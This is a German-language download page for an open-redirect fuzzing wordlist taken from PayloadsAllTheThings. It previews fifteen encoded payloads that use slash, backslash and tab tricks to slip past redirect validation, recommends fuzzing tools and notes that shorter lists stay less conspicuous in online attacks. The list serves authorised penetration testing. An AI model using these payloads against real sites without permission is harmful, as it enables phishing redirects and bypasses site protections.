Open Redirect Encoded Payloads
Open-Redirect-Payloads mit URL-Kodierung, Backslash- und Slash-Präfix-Tricks, um die Redirect-Validierung zu umgehen und Angreifer-Domains zu erreichen.
- Größe
- 2.2 KB
- Kategorie
- Fuzzing
- Quelle
- swisskyrepo/PayloadsAllTheThings
- Lizenz
- MIT
- Empfohlene Tools
- ffufwfuzzburpnuclei
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (2.2 KB) herunter oder kopiere sie über die Schaltflächen oben.
/%09/example.com /%2f%2fexample.com /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/ /%5cexample.com /%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d /.example.com //%09/example.com //%5cexample.com ///%09/example.com ///%5cexample.com ////%09/example.com ////%5cexample.com /////example.com /////example.com/ ////\;@example.com
Open-Redirect-Payloads mit URL-Kodierung, Backslash- und Slash-Präfix-Tricks, um die Redirect-Validierung zu umgehen und Angreifer-Domains zu erreichen.
Diese Liste ist auf das Input-Fuzzing und die Schwachstellenerkennung ausgerichtet. Sie umfasst etwa 2.2 KB und harmoniert gut mit Tools wie ffuf, wfuzz, burp, nuclei. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeiten bieten, bei denen Geschwindigkeit weniger ins Gewicht fällt.
Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
aus ihrer Originalquelle auf GitHub ausgeliefert.
Bezogen von swisskyrepo/PayloadsAllTheThings und unter MIT vertrieben. Verwende Wortlisten nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.